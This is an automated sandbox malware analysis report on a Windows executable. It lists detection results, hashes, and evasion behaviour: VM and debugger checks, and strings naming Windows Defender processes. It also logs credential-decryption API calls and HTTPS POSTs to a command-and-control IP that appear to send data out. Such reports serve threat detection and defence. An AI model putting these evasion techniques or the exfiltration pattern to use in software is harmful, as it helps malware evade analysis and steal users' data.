Windows Analysis Report
V6ZsDcgx4N.exe

Overview

General Information

Sample name: V6ZsDcgx4N.exe (renamed because original name is a hash value)
Original sample name: 0a6bf0678bbd793e39a84dfb4c71d8b709d9e538288bf826c48b1ba899803ba4.exe
Analysis ID: 1499688
MD5: 2d4e723c184d9403b078e53f2de74a23
SHA1: 92fa5f8f346cb987f249bd41755c5aedaf4c8646
SHA256: 0a6bf0678bbd793e39a84dfb4c71d8b709d9e538288bf826c48b1ba899803ba4
Tags: exe

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • V6ZsDcgx4N.exe (PID: 2556 cmdline: "C:\Users\user\Desktop\V6ZsDcgx4N.exe" MD5: 2D4E723C184D9403B078E53F2DE74A23)
    • WerFault.exe (PID: 1412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 54484 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: V6ZsDcgx4N.exe | Avira: detected
Source: V6ZsDcgx4N.exe | ReversingLabs: Detection: 15%
Source: V6ZsDcgx4N.exe | Virustotal: Detection: 24%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: V6ZsDcgx4N.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Code function: 0_2_00191000 CryptUnprotectData (0_2_00191000)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Code function: 0_2_00191C40 CryptSignHashA, CryptUpdateProtectedState, WinHttpTimeFromSystemTime (0_2_00191C40)
Source: V6ZsDcgx4N.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: V6ZsDcgx4N.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Code function: 0_2_00198D40 FindFirstFileW, FindNextFileW, FindClose (0_2_00198D40)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | File opened: C:\Users\user\AppData\Local\Adobe\
Source: Joe Sandbox View | JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: global traffic | HTTP traffic detected: POST /api/receiver/recv HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48 | Content-Length: 3160 | Host: 45.125.66.18
Source: unknown | TCP traffic detected without corresponding DNS query: 45.125.66.18 (12 occurrences)
Source: unknown | HTTP traffic detected: POST /api/receiver/recv HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48 | Content-Length: 3160 | Host: 45.125.66.18
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://microsoft.co3
Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A61000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://45.125.66.18/
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A2E000.00000004.00000001.00020000.00000000.sdmp, V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://45.125.66.18/api/receiver/recv
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://45.125.66.18/api/receiver/recv%
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A2E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://45.125.66.18:443/api/receiver/recv
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Code function: 0_2_00193D50 NtClose, NtClose (0_2_00193D50)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Code function: 0_2_00191470 NtQuerySystemInformation, OpenProcess, GetCurrentProcess, DuplicateHandle, GetFileType, CloseHandle, GetCurrentProcess, DuplicateHandle, CloseHandle, FindCloseChangeNotification (0_2_00191470)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Code function: 0_2_00191610 NtQueryObject, NtQueryObject (0_2_00191610)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 54484
Source: V6ZsDcgx4N.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal76.evad.winEXE@2/5@0/1
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Mutant created: \Sessions\1\BaseNamedObjects\082e2202-17f7-4654-a651-ac9a3778e1d7
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2556
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\8169cccc-3fbd-4722-9720-2ab750781803
Source: V6ZsDcgx4N.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: V6ZsDcgx4N.exe | ReversingLabs: Detection: 15%
Source: V6ZsDcgx4N.exe | Virustotal: Detection: 24%
Source: unknown | Process created: C:\Users\user\Desktop\V6ZsDcgx4N.exe "C:\Users\user\Desktop\V6ZsDcgx4N.exe"
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 54484
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Section loaded: wldp.dll
Source: V6ZsDcgx4N.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: V6ZsDcgx4N.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Code function: 0_2_001917E0 GlobalHandle, LoadLibraryA, GetProcAddress (0_2_001917E0)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 occurrences)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Evasive API call chain: CreateMutex, DecisionNodes, ExitProcess (graph_0-2496)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess (graph_0-2585)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Code function: 0_2_00198D40 FindFirstFileW, FindNextFileW, FindClose (0_2_00198D40)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Code function: 0_2_00198CA0 GetSystemInfo (0_2_00198CA0)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | File opened: C:\Users\user\AppData\Local\Adobe\
Source: Amcache.hve.4.dr | Binary or memory string: VMware
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A2E000.00000004.00000001.00020000.00000000.sdmp, V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWW
Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | API call chain: ExitProcess graph end node (graph_0-2512)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | API call chain: ExitProcess graph end node (graph_0-2507)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Process queried: DebugPort (2 occurrences)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Code function: 0_2_001917E0 GlobalHandle, LoadLibraryA, GetProcAddress (0_2_001917E0)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Code function: 0_2_00191A20 mov eax, dword ptr fs:[00000030h] (0_2_00191A20)
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523257182.0000000000FB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523257182.0000000000FB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523257182.0000000000FB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: V6ZsDcgx4N.exe, 00000000.00000002.2523257182.0000000000FB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Code function: 0_2_00198A80 cpuid (0_2_00198A80)
Source: C:\Users\user\Desktop\V6ZsDcgx4N.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe
MITRE ATT&CK matrix: matched techniques by tactic (unmatched matrix cells omitted)

  • Execution: Native API
  • Persistence: DLL Side-Loading
  • Privilege Escalation: Process Injection, DLL Side-Loading
  • Defense Evasion: Virtualization/Sandbox Evasion, Process Injection, DLL Side-Loading
  • Discovery: Query Registry, Security Software Discovery, Virtualization/Sandbox Evasion, Process Discovery, File and Directory Discovery, System Information Discovery
  • Command and Control: Encrypted Channel, Non-Application Layer Protocol, Application Layer Protocol

Antivirus results for the sample (source, detection, scanner, label):
  • V6ZsDcgx4N.exe: 16%, ReversingLabs
  • V6ZsDcgx4N.exe: 24%, Virustotal
  • V6ZsDcgx4N.exe: 100%, Avira, HEUR/AGEN.1315917
  • V6ZsDcgx4N.exe: 100%, Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
URL scan results (source, detection, scanner, label):
  • http://upx.sf.net: 0%, URL Reputation, safe
  • https://45.125.66.18/: 0%, Avira URL Cloud, safe
  • https://45.125.66.18/api/receiver/recv: 0%, Avira URL Cloud, safe
  • https://45.125.66.18/api/receiver/recv%: 0%, Avira URL Cloud, safe
  • https://45.125.66.18:443/api/receiver/recv: 0%, Avira URL Cloud, safe
  • http://microsoft.co3: 0%, Avira URL Cloud, safe
  • https://45.125.66.18/api/receiver/recv: 3%, Virustotal
  • https://45.125.66.18:443/api/receiver/recv: 3%, Virustotal
  • https://45.125.66.18/: 2%, Virustotal
No contacted domains info
Contacted URLs (name, malicious, antivirus detection, reputation):
  • https://45.125.66.18/api/receiver/recv | Malicious: false | 3% Virustotal; Avira URL Cloud: safe | Reputation: unknown

URLs from memory and binaries (name, source, malicious, antivirus detection, reputation):
  • https://45.125.66.18/api/receiver/recv% | Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
  • http://microsoft.co3 | Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A78000.00000004.00000001.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
  • http://upx.sf.net | Source: Amcache.hve.4.dr | Malicious: false | URL Reputation: safe | Reputation: unknown
  • https://45.125.66.18/ | Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A61000.00000004.00000001.00020000.00000000.sdmp | Malicious: false | 2% Virustotal; Avira URL Cloud: safe | Reputation: unknown
  • https://45.125.66.18:443/api/receiver/recv | Source: V6ZsDcgx4N.exe, 00000000.00000002.2523015066.0000000000A2E000.00000004.00000001.00020000.00000000.sdmp | Malicious: false | 3% Virustotal; Avira URL Cloud: safe | Reputation: unknown
Contacted IPs (IP, domain, country, ASN, ASN name, malicious):
  • 45.125.66.18 | Domain: unknown | Country: Hong Kong | ASN: 133398 | ASN name: TELE-ASTeleAsiaLimitedHK | Malicious: false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1499688
Start date and time: 2024-08-27 12:46:58 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: V6ZsDcgx4N.exe (renamed because original name is a hash value)
Original Sample Name: 0a6bf0678bbd793e39a84dfb4c71d8b709d9e538288bf826c48b1ba899803ba4.exe
Detection: MAL
Classification: mal76.evad.winEXE@2/5@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 23
  • Number of non-executed functions: 5
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 20.42.65.92
  • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
No simulations
No context
No context
Context for ASN TELE-ASTeleAsiaLimitedHK (associated sample name / URL, detection, threat name, context IP):
  • https://57365oo.cc/: malicious, Phisher, 45.125.65.213
  • zte.arm7.elf: malicious, Unknown, 45.125.66.78
  • Kxk45K3cAx.elf: malicious, Gafgyt, Mirai, 45.125.66.223
  • NVu6VqOPCN.elf: malicious, Gafgyt, Mirai, 45.125.66.223
  • 4A4hEAVRnJ.elf: malicious, Gafgyt, Mirai, 45.125.66.223
  • Y6dJm8taZO.elf: malicious, Gafgyt, Mirai, 45.125.66.223
  • 2Ipy5SuBUQ.elf: malicious, Gafgyt, Mirai, 45.125.66.223
  • KgIQ7WeeC1.elf: malicious, Gafgyt, Mirai, 45.125.66.223
  • V5f33oSsOM.elf: malicious, Gafgyt, Mirai, 45.125.66.223
Context for JA3 fingerprint 72a589da586844d7f0818ce684948eea (associated sample name, detection, threat name, context IP):
  • 48DhuEoTcX.exe: malicious, Metasploit, Meterpreter, 45.125.66.18
  • 6863(1)2.exe: malicious, CobaltStrike, 45.125.66.18
  • 20240730#U7cfb#U7edf#U5f02#U5e38#U62a5#U9519.exe: malicious, CobaltStrike, 45.125.66.18
  • LisectAVT_2403002B_116.exe: malicious, Unknown, 45.125.66.18
  • LisectAVT_2403002B_116.exe: malicious, Unknown, 45.125.66.18
  • LisectAVT_2403002B_312.dll: malicious, Trickbot, 45.125.66.18
  • 2new.dll.dll: malicious, CobaltStrike, 45.125.66.18
  • havoc_x64.exe: malicious, Havoc, 45.125.66.18
  • https.exe: malicious, Metasploit, 45.125.66.18
No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9220300302118073
Encrypted: false
SSDEEP: 192:WTFSAcJGOe0sGNmajRomzuiFJZ24IO8L:WMBJGOFsGNmajtzuiFJY4IO8L
MD5: 0528FD5AC0A0E9ADF578BB8DCBDF6D2F
SHA1: 0AE162C1959118B3937E4B49000CD31BA402FF63
SHA-256: 0C6DFE52B84C1BA42C1204DC653A5A12558807BE07144A19E1B610F2DA8E0075
SHA-512: D632BB4092933CC564CB341DC08A4905F1635B04DA989EAFF1CF30A4EBE1859728E0184F2D93AF1DA7BA862F4BB6288B2BF41E62C53B5EABF5577B99C72A8790
Malicious: true
Reputation: low
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Tue Aug 27 10:47:50 2024, 0x1205a4 type
Category:dropped
Size (bytes):1076012
Entropy (8bit):2.8258286923232547
Encrypted:false
SSDEEP:3072:ekCnrNi7ToQqoQNvxtyTvQihxF0uGNHZvpbZbLFIWot:ekCn6mNmTvQgfQ5DbLo
MD5:E120C73D7034082F3D53B4FF8DF9C167
SHA1:04530E47D3D825BB5FCFCB5D63C192F47D701476
SHA-256:9B4968E5AEF879A9B6353AE043302D7A1A2565155778CB37E4A7FAC055D62637
SHA-512:0A10998FE375ABEF438AFFE0BFB2EF9AD5B6593F3C09B596190A1DF5821A19C94E8085C61C0A1AFE77B07B2E07FD9CBDCF864A0BF1D7EA09BECA5D43C687EEE0
Malicious:false
Reputation:low
Preview:MDMP..a..... .........f........................l...(.......<...............bF..........`.......8...........T...........8H..."......................................................................................................eJ......T.......GenuineIntel............T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8364
Entropy (8bit):3.7057914601540154
Encrypted:false
SSDEEP:192:R6l7wVeJGF6g6YEIxSUGDggmfEJjm/hVpr789bMesfkEm:R6lXJU6g6YEOSUAggmfEJjm/hkMdfu
MD5:E326DC4FDCE9BFD26340C729CDE0C150
SHA1:CF3C6B79D7111042B100AE13ADED66F7079569FE
SHA-256:569ADDD92E9F43E71D7713306FB7F651B1A4343A82CF8EECD55A5D60B534D9BA
SHA-512:D84A0187D16D8A595993D69010DCE98578F3EF84F92B9A9AF200C664D8A47E04DEAD25CD0275FE1E15E4D80FD62F3B1C8CE07855D255A0775652BD6EE8914086
Malicious:false
Reputation:low
Preview (UTF-16 XML, shown decoded):
  <?xml version="1.0" encoding="UTF-16"?>
  <WERReportMetadata>
    <OSVersionInformation>
      <WindowsNTVersion>10.0</WindowsNTVersion>
      <Build>19045</Build>
      <Product>(0x30): Windows 10 Pro</Product>
      <Edition>Professional</Edition>
      <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
      <Revision>2006</Revision>
      <Flavor>Multiprocessor Free</Flavor>
      <Architecture>X64</Architecture>
      <LCID>2057</LCID>
    </OSVersionInformation>
    <ProcessInformation>
      <Pid>2556</Pi... (preview truncated)
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4635
Entropy (8bit):4.516314900825132
Encrypted:false
SSDEEP:48:cvIwWl8zsrJg77aI9r/oWpW8VYCYm8M4J0RyFq+q8Me65LD1Ud:uIjfFI75/B7V+JizV1Ud
MD5:93C3ABEA266E32F247339D33A56D86E9
SHA1:2BA61DD3344D6E8D6574F4F00F95704E2F193920
SHA-256:6D37F83E80CE951083C51592BE292EEBF12B2400564B49D73F184C95A2F92899
SHA-512:73216F6620C3C2F2560347025A82128C49DCFCC76E86830DA3CA2BB217A0C1C4D7854AD34EF025939C923CF885D9B54E710A7F2E33B66A75BA42856022993755
Malicious:false
Reputation:low
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473870" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.421565954184726
Encrypted:false
